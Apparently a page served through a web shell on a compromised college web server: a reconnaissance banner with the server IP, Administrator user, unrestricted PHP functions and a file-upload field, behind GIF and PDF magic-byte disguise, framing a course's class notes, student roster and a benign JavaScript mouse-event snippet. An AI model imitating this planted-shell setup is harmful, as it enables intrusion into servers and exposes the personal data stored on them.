GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST2146/Notes/Archive/ |
Upload File : |
Notes: Work on highlighting & css. Display key with name inside border. Need to deal with instructor none and multiple instructors. schedule_3.js line 42 multiple color different sides? user_highlight_ DisplaySchedule_Highlight_None needs to use the method in DisplaySchedule_Highlight_Instructors How about DisplaySchedule_Highlight_Rooms, DisplaySchedule_Highlight_Conflicts, and DisplaySchedule_Highlight_Credentials? Add ability to customize the colors. New task work on filters 2020-05-07 10 points. Attended Thursday work session. Thursday, May 7th Attended: Alexander Gould Damien Carlson Drew Kallhoff Leah Schmid noon Zachary Nordmeyer Students: Abdifatah Mohamed Alexander Gould Austin Lease Branden Buermann Christopher Seiffert Cody Raduenz Damien Carlson Darrien McAllister Drew Kallhoff Jameashia Nwankwo Kathryn Nelson Leah Schmid Natasha Iverson Terence Jackson Zachary Nordmeyer detect mouse move vs click: const element = document.createElement('div') element.innerHTML = 'test' document.body.appendChild(element) let moved let downListener = () => { moved = false } element.addEventListener('mousedown', downListener) let moveListener = () => { moved = true } element.addEventListener('mousemove', moveListener) let upListener = () => { if (moved) { console.log('moved') } else { console.log('not moved') } } element.addEventListener('mouseup', upListener) // release memory element.removeEventListener('mousedown', downListener) element.removeEventListener('mousemove', moveListener) element.removeEventListener('mouseup', upListener)